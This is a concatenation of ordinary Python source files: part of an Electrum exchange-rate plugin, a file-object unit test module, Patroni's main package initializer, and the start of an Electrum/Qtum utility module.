prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from .util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
test_file2k.py
|
import sys
import os
import errno
import unittest
import time
from array import array
from weakref import proxy
try:
import threading
except ImportError:
threading = None
from test import support
from test.support import TESTFN, run_unittest
from collections import UserList
class AutoFileTests(unittest.TestCase):
# file tests for which a test file is automatically set up
def setUp(self):
self.f = open(TESTFN, 'wb')
def tearDown(self):
if self.f:
self.f.close()
os.remove(TESTFN)
def testWeakRefs(self):
# verify weak references
p = proxy(self.f)
p.write('teststring')
self.assertEqual(self.f.tell(), p.tell())
self.f.close()
self.f = None
if support.is_jython: # GC is not immediate: borrow a trick
from test_weakref import extra_collect
extra_collect()
self.assertRaises(ReferenceError, getattr, p, 'tell')
def testAttributes(self):
# verify expected attributes exist
f = self.f
with support.check_py3k_warnings():
softspace = f.softspace
f.name # merely shouldn't blow up
f.mode # ditto
f.closed # ditto
with support.check_py3k_warnings():
# verify softspace is writable
f.softspace = softspace # merely shouldn't blow up
# verify the others aren't
for attr in 'name', 'mode', 'closed':
self.assertRaises((AttributeError, TypeError), setattr, f, attr, 'oops')
def testReadinto(self):
# verify readinto
self.f.write('12')
self.f.close()
a = array('c', 'x'*10)
self.f = open(TESTFN, 'rb')
n = self.f.readinto(a)
self.assertEqual('12', a.tostring()[:n])
def testWritelinesUserList(self):
# verify writelines with instance sequence
l = UserList(['1', '2'])
self.f.writelines(l)
self.f.close()
self.f = open(TESTFN, 'rb')
buf = self.f.read()
self.assertEqual(buf, '12')
def testWritelinesIntegers(self):
# verify writelines with integers
self.assertRaises(TypeError, self.f.writelines, [1, 2, 3])
def testWritelinesIntegersUserList(self):
# verify writelines with integers in UserList
l = UserList([1, 2, 3])
self.assertRaises(TypeError, self.f.writelines, l)
def testWritelinesNonString(self):
# verify writelines with non-string object
class NonString:
pass
self.assertRaises(TypeError, self.f.writelines,
[NonString(), NonString()])
def testRepr(self):
# verify repr works
self.assertTrue(repr(self.f).startswith("<open file '" + TESTFN))
# see issue #14161
if sys.platform == "win32" or (support.is_jython and os._name == "nt"):
# Windows doesn't like \r\n\t" in the file name, but ' is ok
fname = "xx'xx"
else:
fname = 'xx\rxx\nxx\'xx"xx'
with open(fname, 'w') as f:
self.addCleanup(os.remove, fname)
self.assertTrue(repr(f).startswith(
"<open file %r, mode 'w' at" % fname))
def testErrors(self):
self.f.close()
self.f = open(TESTFN, 'rb')
f = self.f
self.assertEqual(f.name, TESTFN)
self.assertTrue(not f.isatty())
self.assertTrue(not f.closed)
self.assertRaises(TypeError, f.readinto, "")
f.close()
self.assertTrue(f.closed)
def testMethods(self):
methods = ['fileno', 'flush', 'isatty', 'next', 'read', 'readinto',
'readline', 'readlines', 'seek', 'tell', 'truncate',
'write', '__iter__']
deprecated_methods = ['xreadlines']
if sys.platform.startswith('atheos'):
methods.remove('truncate')
# __exit__ should close the file
self.f.__exit__(None, None, None)
self.assertTrue(self.f.closed)
for methodname in methods:
method = getattr(self.f, methodname)
# should raise on closed file
self.assertRaises((TypeError, ValueError), method)
with support.check_py3k_warnings():
for methodname in deprecated_methods:
method = getattr(self.f, methodname)
self.assertRaises(ValueError, method)
self.assertRaises(ValueError, self.f.writelines, [])
# file is closed, __exit__ shouldn't do anything
self.assertEqual(self.f.__exit__(None, None, None), None)
# it must also return None if an exception was given
try:
1 // 0
except:
self.assertEqual(self.f.__exit__(*sys.exc_info()), None)
def testReadWhenWriting(self):
self.assertRaises(IOError, self.f.read)
def testNastyWritelinesGenerator(self):
def nasty():
for i in range(5):
if i == 3:
self.f.close()
yield str(i)
self.assertRaises(ValueError, self.f.writelines, nasty())
def testIssue5677(self):
# We don't use the already-open file.
self.f.close()
# Remark: Do not perform more than one test per open file,
# since that does NOT catch the readline error on Windows.
data = 'xxx'
for mode in ['w', 'wb', 'a', 'ab']:
for attr in ['read', 'readline', 'readlines']:
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, getattr(self.f, attr))
self.f.close()
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, lambda: [line for line in self.f])
self.f.close()
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, self.f.readinto, bytearray(len(data)))
self.f.close()
for mode in ['r', 'rb', 'U', 'Ub', 'Ur', 'rU', 'rbU', 'rUb']:
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.write, data)
self.f.close()
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.writelines, [data, data])
self.f.close()
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.truncate)
self.f.close()
class OtherFileTests(unittest.TestCase):
def setUp(self):
# (Jython addition) track open file so we can clean up
self.f = None
self.filename = TESTFN
def tearDown(self):
# (Jython addition) clean up to prevent errors cascading
if self.f:
self.f.close()
try:
os.remove(self.filename)
except EnvironmentError as ee:
if ee.errno != errno.ENOENT:
raise ee
def testOpenDir(self):
this_dir = os.path.dirname(__file__) or os.curdir
for mode in (None, "w"):
try:
if mode:
self.f = open(this_dir, mode)
else:
self.f = open(this_dir)
except IOError as e:
self.assertEqual(e.filename, this_dir)
else:
self.fail("opening a directory didn't raise an IOError")
def testModeStrings(self):
# check invalid mode strings
for mode in ("", "aU", "wU+"):
try:
self.f = f = open(TESTFN, mode)
except ValueError:
pass
else:
f.close()
self.fail('%r is an invalid file mode' % mode)
# Some invalid modes fail on Windows, but pass on Unix
# Issue3965: avoid a crash on Windows when filename is unicode
for name in (TESTFN, str(TESTFN), str(TESTFN + '\t')):
try:
self.f = f = open(name, "rr")
except (IOError, ValueError):
pass
else:
f.close()
def testStdin(self):
# This causes the interpreter to exit on OSF1 v5.1.
if sys.platform != 'osf1V5':
self.assertRaises(IOError, sys.stdin.seek, -1)
else:
print((
' Skipping sys.stdin.seek(-1), it may crash the interpreter.'
' Test manually.'), file=sys.__stdout__)
self.assertRaises(IOError, sys.stdin.truncate)
def testUnicodeOpen(self):
# verify repr works for unicode too
self.f = f = open(str(TESTFN), "w")
self.assertTrue(repr(f).startswith("<open file u'" + TESTFN))
f.close()
os.unlink(TESTFN)
def testBadModeArgument(self):
# verify that we get a sensible error message for bad mode argument
bad_mode = "qwerty"
try:
self.f = f = open(TESTFN, bad_mode)
except ValueError as msg:
if msg.args[0] != 0:
s = str(msg)
if TESTFN in s or bad_mode not in s:
self.fail("bad error message for invalid mode: %s" % s)
# if msg.args[0] == 0, we're probably on Windows where there may
# be no obvious way to discover why open() failed.
else:
f.close()
self.fail("no error for invalid mode: %s" % bad_mode)
def testSetBufferSize(self):
# make sure that explicitly setting the buffer size doesn't cause
# misbehaviour especially with repeated close() calls
for s in (-1, 0, 1, 512):
try:
self.f = f = open(TESTFN, 'w', s)
f.write(str(s))
f.close()
f.close()
self.f = f = open(TESTFN, 'r', s)
d = int(f.read())
f.close()
f.close()
except IOError as msg:
self.fail('error setting buffer size %d: %s' % (s, str(msg)))
self.assertEqual(d, s)
def testTruncateOnWindows(self):
def bug801631():
# SF bug <http://www.python.org/sf/801631>
# "file.truncate fault on windows"
self.f = f = open(TESTFN, 'wb')
f.write('12345678901') # 11 bytes
f.close()
self.f = f = open(TESTFN, 'rb+')
data = f.read(5)
if data != '12345':
self.fail("Read on file opened for update failed %r" % data)
if f.tell() != 5:
self.fail("File pos after read wrong %d" % f.tell())
f.truncate()
if f.tell() != 5:
self.fail("File pos after ftruncate wrong %d" % f.tell())
f.close()
size = os.path.getsize(TESTFN)
if size != 5:
self.fail("File size after ftruncate wrong %d" % size)
try:
bug801631()
finally:
os.unlink(TESTFN)
@unittest.skipIf(support.is_jython, "Specific to CPython")
def testIteration(self):
# Test the complex interaction when mixing file-iteration and the
# various read* methods. Ostensibly, the mixture could just be tested
# to work when it should work according to the Python language,
# instead of fail when it should fail according to the current CPython
# implementation. People don't always program Python the way they
# should, though, and the implemenation might change in subtle ways,
# so we explicitly test for errors, too; the test will just have to
# be updated when the implementation changes.
dataoffset = 16384
filler = "ham\n"
assert not dataoffset % len(filler), \
"dataoffset must be multiple of len(filler)"
nchunks = dataoffset // len(filler)
testlines = [
"spam, spam and eggs\n",
"eggs, spam, ham and spam\n",
"saussages, spam, spam and eggs\n",
"spam, ham, spam and eggs\n",
"spam, spam, spam, spam, spam, ham, spam\n",
"wonderful spaaaaaam.\n"
]
methods = [("readline", ()), ("read", ()), ("readlines", ()),
("readinto", (array("c", " "*100),))]
try:
# Prepare the testfile
bag = open(TESTFN, "w")
bag.write(filler * nchunks)
bag.writelines(testlines)
bag.close()
# Test for appropriate errors mixing read* and iteration
for methodname, args in methods:
self.f = f = open(TESTFN)
if next(f) != filler:
self.fail, "Broken testfile"
meth = getattr(f, methodname)
try:
meth(*args)
except ValueError:
pass
else:
self.fail("%s%r after next() didn't raise ValueError" %
(methodname, args))
f.close()
# Test to see if harmless (by accident) mixing of read* and
# iteration still works. This depends on the size of the internal
# iteration buffer (currently 8192,) but we can test it in a
# flexible manner. Each line in the bag o' ham is 4 bytes
# ("h", "a", "m", "\n"), so 4096 lines of that should get us
# exactly on the buffer boundary for any power-of-2 buffersize
# between 4 and 16384 (inclusive).
self.f = f = open(TESTFN)
for i in range(nchunks):
next(f)
testline = testlines.pop(0)
try:
line = f.readline()
except ValueError:
self.fail("readline() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("readline() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
buf = array("c", "\x00" * len(testline))
try:
f.readinto(buf)
except ValueError:
self.fail("readinto() after next() with supposedly empty "
"iteration-buffer failed anyway")
line = buf.tostring()
if line != testline:
self.fail("readinto() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
try:
line = f.read(len(testline))
except ValueError:
self.fail("read() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("read() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
try:
lines = f.readlines()
except ValueError:
self.fail("readlines() after next() with supposedly empty "
"iteration-buffer failed anyway")
if lines != testlines:
self.fail("readlines() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
# Reading after iteration hit EOF shouldn't hurt either
self.f = f = open(TESTFN)
try:
for line in f:
pass
try:
f.readline()
f.readinto(buf)
f.read()
f.readlines()
except ValueError:
self.fail("read* failed after next() consumed file")
finally:
f.close()
finally:
os.unlink(TESTFN)
@unittest.skipUnless(support.is_jython, "Applicable to Jython")
def testIterationMixes(self):
# And now for something completely different. An implementation where
# various read* methods mix happily with iteration over the lines of
# a file using next().
sheep = [
"It's my belief that these sheep\n",
"are labouring under the\n",
"mis-apprehension that they're birds.\n",
"Now witness their attempts\n",
"to fly from tree to tree.\n",
"Notice that they do not so much fly\n",
"as plummet.\n"
]
# Prepare the testfile
self.f = f = open(TESTFN, "w")
f.writelines(sheep)
f.close()
# Test for appropriate results mixing read* and iteration
self.f = f = open(TESTFN)
self.assertEqual(next(f), sheep[0])
self.assertEqual(f.readline(), sheep[1])
self.assertEqual(next(f), sheep[2])
self.assertEqual(f.read(5), sheep[3][:5])
r = array('c', "1234567")
f.readinto(r)
self.assertEqual(r, array('c', sheep[3][5:12]))
self.assertEqual(next(f), sheep[3][12:])
r = f.readlines()
self.assertEqual(r, sheep[4:])
self.assertRaises(StopIteration, f.__next__)
f.close()
class FileSubclassTests(unittest.TestCase):
def testExit(self):
# test that exiting with context calls subclass' close
class C(file):
def __init__(self, *args):
self.subclass_closed = False
file.__init__(self, *args)
def close(self):
self.subclass_closed = True
file.close(self)
with C(TESTFN, 'w') as f:
pass
self.assertTrue(f.subclass_closed)
@unittest.skipUnless(threading, 'Threading required for this test.')
class FileThreadingTests(unittest.TestCase):
# These tests check the ability to call various methods of file objects
# (including close()) concurrently without crashing the Python interpreter.
# See #815646, #595601
# Modified for Jython so that each worker thread holds *and closes* its own
# file object, since we cannot rely on immediate garbage collection closing
# files. (Open file objects prevent deletion of TESTFN on Windows at least.)
def setUp(self):
self._threads = support.threading_setup()
self.filename = TESTFN
self.exc_info = None
with open(self.filename, "w") as f:
f.write("\n".join("0123456789"))
self._count_lock = threading.Lock()
self.close_count = 0
self.close_success_count = 0
self.use_buffering = False
def tearDown(self):
try:
os.remove(self.filename)
except EnvironmentError as ee:
# (Jython addition) detect failure common on Windows, on missing
# close, that creates spurious errors in subsequent tests.
if ee.errno != errno.ENOENT:
raise ee
support.threading_cleanup(*self._threads)
def _create_file(self):
if self.use_buffering:
return open(self.filename, "w+", buffering=1024*16)
else:
return open(self.filename, "w+")
def _close_file(self, f):
with self._count_lock:
self.close_count += 1
f.close()
with self._count_lock:
self.close_success_count += 1
# Close one file object and return a new one
def _close_and_reopen_file(self, f):
self._close_file(f)
return self._create_file()
def _run_workers(self, func, nb_workers, duration=0.2):
with self._count_lock:
self.close_count = 0
self.close_success_count = 0
self.do_continue = True
threads = []
try:
for i in range(nb_workers):
t = threading.Thread(target=func)
t.start()
threads.append(t)
for _ in range(100):
time.sleep(duration/100)
with self._count_lock:
if self.close_count-self.close_success_count > nb_workers+1:
if support.verbose:
print('Q', end=' ')
break
time.sleep(duration)
finally:
self.do_continue = False
for t in threads:
t.join()
def _test_close_open_io(self, io_func, nb_workers=5):
def worker():
# Each worker has its own currently open file object
myfile = None
try:
myfile = self._create_file()
while self.do_continue:
io_func(myfile)
myfile = self._close_and_reopen_file(myfile)
except Exception as e:
# Stop the test (other threads) and remember why
self.do_continue = False
self.exc_info = sys.exc_info()
# Finally close the last file object
if myfile:
self._close_file(myfile)
self._run_workers(worker, nb_workers)
if self.exc_info:
# Some worker saved an exception: re-raise it now
raise self.exc_info[0](self.exc_info[1]).with_traceback(self.exc_info[2])
if support.verbose:
# Useful verbose statistics when tuning this test to take
# less time to run but still ensuring that its still useful.
#
# the percent of close calls that raised an error
percent = 100.
if self.close_count > 0:
percent -= 100.*self.close_success_count/self.close_count
print(self.close_count, ('%.4f ' % percent), end=' ')
# Each test function defines an operation on the worker's file object
def test_close_open(self):
def io_func(f):
pass
self._test_close_open_io(io_func)
def test_close_open_flush(self):
def io_func(f):
f.flush()
self._test_close_open_io(io_func)
def test_close_open_iter(self):
def io_func(f):
list(iter(f))
self._test_close_open_io(io_func)
def test_close_open_isatty(self):
def io_func(f):
f.isatty()
self._test_close_open_io(io_func)
def test_close_open_print(self):
def io_func(f):
print('', file=f)
self._test_close_open_io(io_func)
def test_close_open_print_buffered(self):
self.use_buffering = True
def io_func(f):
print('', file=f)
self._test_close_open_io(io_func)
def test_close_open_read(self):
def io_func(f):
f.read(0)
self._test_close_open_io(io_func)
def test_close_open_readinto(self):
def io_func(f):
a = array('c', 'xxxxx')
f.readinto(a)
self._test_close_open_io(io_func)
def test_close_open_readline(self):
def io_func(f):
f.readline()
self._test_close_open_io(io_func)
def test_close_open_readlines(self):
def io_func(f):
f.readlines()
self._test_close_open_io(io_func)
def test_close_open_seek(self):
def io_func(f):
f.seek(0, 0)
self._test_close_open_io(io_func)
def test_close_open_tell(self):
def io_func(f):
f.tell()
self._test_close_open_io(io_func)
def test_close_open_truncate(self):
def io_func(f):
f.truncate()
self._test_close_open_io(io_func)
def test_close_open_write(self):
def io_func(f):
f.write('')
self._test_close_open_io(io_func)
def test_close_open_writelines(self):
def io_func(f):
f.writelines('')
self._test_close_open_io(io_func)
class StdoutTests(unittest.TestCase):
def test_move_stdout_on_write(self):
# Issue 3242: sys.stdout can be replaced (and freed) during a
# print statement; prevent a segfault in this case
save_stdout = sys.stdout
class File:
def write(self, data):
if '\n' in data:
sys.stdout = save_stdout
try:
sys.stdout = File()
print("some text")
finally:
sys.stdout = save_stdout
def test_del_stdout_before_print(self):
# Issue 4597: 'print' with no argument wasn't reporting when
# sys.stdout was deleted.
save_stdout = sys.stdout
del sys.stdout
try:
print()
except RuntimeError as e:
self.assertEqual(str(e), "lost sys.stdout")
else:
self.fail("Expected RuntimeError")
finally:
sys.stdout = save_stdout
def test_unicode(self):
import subprocess
def get_message(encoding, *code):
code = ';'.join(code) # jython.bat cannot cope with '\n' in arguments
env = os.environ.copy()
env['PYTHONIOENCODING'] = encoding
process = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 0)
return stdout
def check_message(text, encoding, expected):
stdout = get_message(encoding,
"import sys",
"sys.stdout.write(%r)" % text,
"sys.stdout.flush()")
self.assertEqual(stdout, expected)
# test the encoding
check_message('15\u20ac', "iso-8859-15", "15\xa4")
check_message('15\u20ac', "utf-8", '15\xe2\x82\xac')
check_message('15\u20ac', "utf-16-le", '1\x005\x00\xac\x20')
# test the error handler
check_message('15\u20ac', "iso-8859-1:ignore", "15")
check_message('15\u20ac', "iso-8859-1:replace", "15?")
check_message('15\u20ac', "iso-8859-1:backslashreplace", "15\\u20ac")
# test the buffer API
for objtype in ('buffer', 'bytearray'):
stdout = get_message('ascii',
'import sys',
r'sys.stdout.write(%s("\xe9"))' % objtype,
'sys.stdout.flush()')
self.assertEqual(stdout, "\xe9")
def test_main():
run_unittest(
AutoFileTests,
OtherFileTests,
FileSubclassTests,
FileThreadingTests,
StdoutTests
)
if __name__ == '__main__':
test_main()
|
__init__.py
|
import logging
import os
import signal
import sys
import time
logger = logging.getLogger(__name__)
class Patroni(object):
def __init__(self):
from patroni.api import RestApiServer
from patroni.config import Config
from patroni.dcs import get_dcs
from patroni.ha import Ha
from patroni.log import PatroniLogger
from patroni.postgresql import Postgresql
from patroni.request import PatroniRequest
from patroni.version import __version__
from patroni.watchdog import Watchdog
self.setup_signal_handlers()
self.version = __version__
self.logger = PatroniLogger()
self.config = Config()
self.logger.reload_config(self.config.get('log', {}))
self.dcs = get_dcs(self.config)
self.watchdog = Watchdog(self.config)
self.load_dynamic_configuration()
self.postgresql = Postgresql(self.config['postgresql'])
self.api = RestApiServer(self, self.config['restapi'])
self.request = PatroniRequest(self.config, True)
self.ha = Ha(self)
self.tags = self.get_tags()
self.next_run = time.time()
self.scheduled_restart = {}
def load_dynamic_configuration(self):
from patroni.exceptions import DCSError
while True:
try:
cluster = self.dcs.get_cluster()
if cluster and cluster.config and cluster.config.data:
if self.config.set_dynamic_configuration(cluster.config):
self.dcs.reload_config(self.config)
self.watchdog.reload_config(self.config)
elif not self.config.dynamic_configuration and 'bootstrap' in self.config:
if self.config.set_dynamic_configuration(self.config['bootstrap']['dcs']):
self.dcs.reload_config(self.config)
break
except DCSError:
logger.warning('Can not get cluster from dcs')
time.sleep(5)
def get_tags(self):
return {tag: value for tag, value in self.config.get('tags', {}).items()
if tag not in ('clonefrom', 'nofailover', 'noloadbalance', 'nosync') or value}
@property
def nofailover(self):
return bool(self.tags.get('nofailover', False))
@property
def nosync(self):
return bool(self.tags.get('nosync', False))
def reload_config(self, sighup=False):
try:
self.tags = self.get_tags()
self.logger.reload_config(self.config.get('log', {}))
self.watchdog.reload_config(self.config)
if sighup:
self.request.reload_config(self.config)
self.api.reload_config(self.config['restapi'])
self.postgresql.reload_config(self.config['postgresql'], sighup)
self.dcs.reload_config(self.config)
except Exception:
logger.exception('Failed to reload config_file=%s', self.config.config_file)
@property
def replicatefrom(self):
return self.tags.get('replicatefrom')
def sighup_handler(self, *args):
self._received_sighup = True
def sigterm_handler(self, *args):
with self._sigterm_lock:
if not self._received_sigterm:
self._received_sigterm = True
sys.exit()
@property
def noloadbalance(self):
return bool(self.tags.get('noloadbalance', False))
def schedule_next_run(self):
self.next_run += self.dcs.loop_wait
current_time = time.time()
nap_time = self.next_run - current_time
if nap_time <= 0:
self.next_run = current_time
# Release the GIL so we don't starve anyone waiting on async_executor lock
time.sleep(0.001)
# Warn user that Patroni is not keeping up
logger.warning("Loop time exceeded, rescheduling immediately.")
elif self.ha.watch(nap_time):
self.next_run = time.time()
@property
def received_sigterm(self):
with self._sigterm_lock:
return self._received_sigterm
def run(self):
self.api.start()
self.logger.start()
self.next_run = time.time()
while not self.received_sigterm:
if self._received_sighup:
self._received_sighup = False
if self.config.reload_local_configuration():
self.reload_config(True)
else:
self.postgresql.config.reload_config(self.config['postgresql'], True)
logger.info(self.ha.run_cycle())
if self.dcs.cluster and self.dcs.cluster.config and self.dcs.cluster.config.data \
and self.config.set_dynamic_configuration(self.dcs.cluster.config):
self.reload_config()
if self.postgresql.role != 'uninitialized':
self.config.save_cache()
self.schedule_next_run()
def setup_signal_handlers(self):
from threading import Lock
self._received_sighup = False
self._sigterm_lock = Lock()
self._received_sigterm = False
if os.name != 'nt':
signal.signal(signal.SIGHUP, self.sighup_handler)
signal.signal(signal.SIGTERM, self.sigterm_handler)
def shutdown(self):
with self._sigterm_lock:
self._received_sigterm = True
try:
self.api.shutdown()
except Exception:
logger.exception('Exception during RestApi.shutdown')
self.ha.shutdown()
self.logger.shutdown()
def patroni_main():
patroni = Patroni()
try:
patroni.run()
except KeyboardInterrupt:
pass
finally:
patroni.shutdown()
def fatal(string, *args):
sys.stderr.write('FATAL: ' + string.format(*args) + '\n')
sys.exit(1)
def check_psycopg2():
min_psycopg2 = (2, 5, 4)
min_psycopg2_str = '.'.join(map(str, min_psycopg2))
def parse_version(version):
for e in version.split('.'):
try:
yield int(e)
except ValueError:
break
try:
import psycopg2
version_str = psycopg2.__version__.split(' ')[0]
version = tuple(parse_version(version_str))
if version < min_psycopg2:
fatal('Patroni requires psycopg2>={0}, but only {1} is available', min_psycopg2_str, version_str)
except ImportError:
fatal('Patroni requires psycopg2>={0} or psycopg2-binary', min_psycopg2_str)
def main():
check_psycopg2()
if os.getpid() != 1:
return patroni_main()
# Patroni started with PID=1, it looks like we are in the container
pid = 0
# Looks like we are in a docker, so we will act like init
def sigchld_handler(signo, stack_frame):
try:
while True:
ret = os.waitpid(-1, os.WNOHANG)
if ret == (0, 0):
break
elif ret[0] != pid:
logger.info('Reaped pid=%s, exit status=%s', *ret)
except OSError:
pass
def passtochild(signo, stack_frame):
if pid:
os.kill(pid, signo)
if os.name != 'nt':
signal.signal(signal.SIGCHLD, sigchld_handler)
signal.signal(signal.SIGHUP, passtochild)
signal.signal(signal.SIGQUIT, passtochild)
signal.signal(signal.SIGUSR1, passtochild)
signal.signal(signal.SIGUSR2, passtochild)
signal.signal(signal.SIGINT, passtochild)
signal.signal(signal.SIGABRT, passtochild)
signal.signal(signal.SIGTERM, passtochild)
import multiprocessing
patroni = multiprocessing.Process(target=patroni_main)
patroni.start()
pid = patroni.pid
patroni.join()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import urllib.request, urllib.parse, urllib.error
import queue
import threading
import hmac
from struct import Struct
import webbrowser
import stat
from typing import NamedTuple
import inspect
from locale import localeconv
from .i18n import _
import aiohttp
from aiohttp_socks import SocksConnector, SocksVer
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'QTUM':8, 'mQTUM':5, 'uQTUM':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
unpack_int32_from = Struct('<i').unpack_from
unpack_int64_from = Struct('<q').unpack_from
unpack_uint16_from = Struct('<H').unpack_from
unpack_uint32_from = Struct('<I').unpack_from
unpack_uint64_from = Struct('<Q').unpack_from
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class QtumException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)' % self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
verbosity_filter = ''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
if self.verbosity_filter in verbosity or verbosity == '*':
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
